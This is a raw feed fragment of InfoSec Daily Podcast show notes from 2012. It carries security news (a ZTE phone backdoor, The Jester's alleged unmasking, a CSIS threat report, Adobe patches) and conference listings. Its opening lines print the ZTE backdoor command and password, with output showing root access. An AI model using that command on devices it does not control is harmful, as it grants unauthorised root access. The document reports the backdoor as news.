<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$ sync_agent ztex1609523</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"># id</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">uid=0(root) gid=0(root)</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nice backdoor, ZTE.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://illuminat3.blogspot.ca/2012/05/breaking-th3j35t3r-patriot-hacker-to-be.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://illuminat3.blogspot.ca/2012/05/breaking-th3j35t3r-patriot-hacker-to-be.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Notorious patriotic hacker The Jester, dubbed &quot;th3j35t3r&quot; on Twitter, has reportedly been unmasked by a former colleague in the US Army.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The unnamed colleague</span><a href="https://twitter.com/#%21/cubespherical"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> (@cubespherical</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) uploaded what was claimed to be </span><a href="http://i.imgur.com/BdK3T.jpg"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">direct message exchanges</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> via Twitter with the hacker, in which it is revealed how the two had met when they served in the US Special Operations Command (SOCOM).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The veracity of exchange cannot yet be verified.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the exchange, Cubespherical said they knew The Jester because they had come to blows during their time in the military. They also claimed they knew The Jester had gone &ldquo;toe-to-toe three times a week when [he] was on base&rdquo;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cubespherical also tweeted a</span><a href="http://i.imgur.com/cz6B0.jpg"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> photo of a truck</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> purportedly owned by The Jester.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">@</span><a href="https://twitter.com/th3j35t3r"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">th3j35t3r</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> sent you a DM. You should check it at your earliest convenience. In your interests.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash; Smedley Manning (@cubespherical)</span><a href="https://twitter.com/cubespherical/status/201346425966182402"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> May 12, 2012</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the message exchange, Cubespherical said they would publish the hacker&#39;s real identity and resume after they had acquired a donation of 20,000 bitcoinc for whistle-blower web site Wikileaks, an organisation The Jester has attacked by denial of service (DoS) and disparaged in a series of tweets.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Jester&#39;s Real Life ID will be given up finally when this bitcoin address 15JDgkwFVXvuxCt66eUQ434ty3jrvwPfGe has 20K BTC (bitcoins),&rdquo; &nbsp;- Cubespherical&#39;s Twitter account.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">About half of the donations would go to Wikileaks, while the remainder would help Cubespherical &ldquo;hide&rdquo;, they said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Both The Jester&#39;s</span><a href="https://twitter.com/#%21/th3j35t3r"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> twitter account</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and</span><a href="http://th3j35t3r.wordpress.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> blog entries</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> have since been deleted.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, Cubespherical had</span><a href="http://t.co/yoxOipMx"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> uploaded a HTML cache file</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of the Jester&#39;s tweets.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Jester was known for launching DoS attacks against websites the hacker accused of spreading terrorist propaganda. The hacker had also built a DoS tool dubbed XerXes.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-668-csis-report-leopard-update-analyzing-os-x-shiqiang-gang-nice-backdoor-th3j35t3r-unmasked/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3938/0/infosec-daily-podcast-episode-668.mp3" length="22196813" type="audio/mpeg" />
		<itunes:duration>0:46:14</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 668 for May 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Themson Mester, Karthik Rangarajan, and Dr B0n3z.
&#160;
Announcements
EFF DEFCONtest
https://supporters.eff.org/c[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 668 for May 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Themson Mester, Karthik Rangarajan, and Dr B0n3z.
&#160;
Announcements
EFF DEFCONtest
https://supporters.eff.org/civicrm/pcp/info?reset=1&#38;id=42&#38;ap=1
&#160;
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012&#160;&#160;&#160; 
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Hacker Wars &#8212; The Movie
Ever wanted to participate in Live action Capture the Flag? Well here is your chance
What: Thi contest is modeled on so-called &#34;penetration tests&#34; which is when ethical hackers attempt to break in to a company&#39;s computer systems with the target&#39;s permission. &#160;This is in an effort to find security problems before the bad guys do. &#160;The contest won&#39;t just involve sitting at computers, it will also involve other typical activities: performing reconnaissance of physical facilities, surveillance of individuals, urban exploration, infiltration of buildings, and surreptitious contact with moles in the target organization.
http://www.kickstarter.com/projects/278183749/hacker-wars
&#160;
Stories
Source: &#160;http://www.theglobeandmail.com/news/politics/cyber-spies-will-target-smartphones-tablets-csis-report/article2429242
Hand-held devices such as smartphones and tablets could be the next frontier for cyber-spies and other rogue players in the digital world, warns a newly declassified assessment from Canada&#39;s intelligence agency.
Opportunities for malicious hackers are growing as computer systems move from the back rooms of corporations and government agencies into the palms and laptops of employees, says the Canadian Security Intelligence Service assessment.
&#8220;New cyber attack tools and techniques will be developed in efforts to compromise Canadian public- and private-sector systems,&#8221; says the report, perhaps the agency&#39;s most ominous forecast to date on the perils of cyberspace.
&#8220;The cyber-related threat environment will evolve and become more complex, creating ever greater challenges for Canada within the context of national security.&#8221;
The 18-page CSIS report, Cyber Threats and Security: An Overview, was obtained by The Canadian Press under the Access to Information Act. Though heavily edited, the November 2011 assessment, originally classified top secret, is another sign of the intelligence service&#39;s growing interest in the dangers emerging from cyberspace.
Cyber threats posed by unfriendly states, groups and individuals &#8220;affect Canada&#39;s national and economic security,&#8221; says the [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 667 &#8211;  Abobe Responds, CSIS Notes, The Unknowns, Swedish Monitoring, and New Warnings</title>
		<link>http://www.isdpodcast.com/episode-667-abobe-responds-csis-notes-the-unknowns-swedish-monitoring-and-new-warnings</link>
		<comments>http://www.isdpodcast.com/episode-667-abobe-responds-csis-notes-the-unknowns-swedish-monitoring-and-new-warnings#comments</comments>
		<pubDate>Tue, 15 May 2012 00:56:24 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3934</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 667 for May 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Beau Woods, and Karthik Rangarajan. &#160; Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012&#160;&#160;&#160; Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org &#160; AIDE 2012 When: May 21-25, 2012 Where: [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.3707720812637705" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 667 for May 14, 2012. &nbsp;</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Beau Woods, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;May 19, 2012&nbsp;&nbsp;&nbsp; <br class="kix-line-break" /><br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://granitesec.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon^3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 19-21, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hack3rcon.org/</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.h-online.com/security/news/item/Adobe-backs-down-will-release-patches-for-critical-holes-1574341.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/security/news/item/Adobe-backs-down-will-release-patches-for-critical-holes-1574341.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adobe has</span><a href="http://blogs.adobe.com/psirt/2012/05/update-to-security-bulletins-for-adobe-illustrator-apsb12-10-adobe-photoshop-apsb12-11-and-adobe-flash-professional-apsb12-12.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> announced</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &ndash; through changes to the security advisories it issued earlier this week &ndash; that it is developing patches for the critical holes in the CS5.x versions of Adobe Photoshop, Illustrator and Flash Professional, after previously advising users that they needed to buy the just-released CS6 versions of the applications.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The revised advisories retain the suggestion that users should upgrade but also now state,</span><a href="http://www.adobe.com/support/security/bulletins/apsb12-11.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> for example</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, &quot;We are in the process of resolving these vulnerabilities in Adobe Photoshop CS5.x, and will update this Security Bulletin once the patch is available&quot;. Adobe has given no schedule for the availability of patches.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the original 8 May advisories, the company had said only that users of these products would need to purchase the upgrade from the CS5 and CS5.5 versions to the,</span><a href="http://www.adobe.com/aboutadobe/pressroom/pressreleases/201205/050712AdobeCS6Ship.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> just shipping on 7 May</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, CS6 versions to close the critical holes they were detailing; a move that was seen as</span><a href="http://www.h-online.com/news/item/Adobe-puts-a-price-tag-on-security-updates-for-Photoshop-and-others-1571517.html"><span 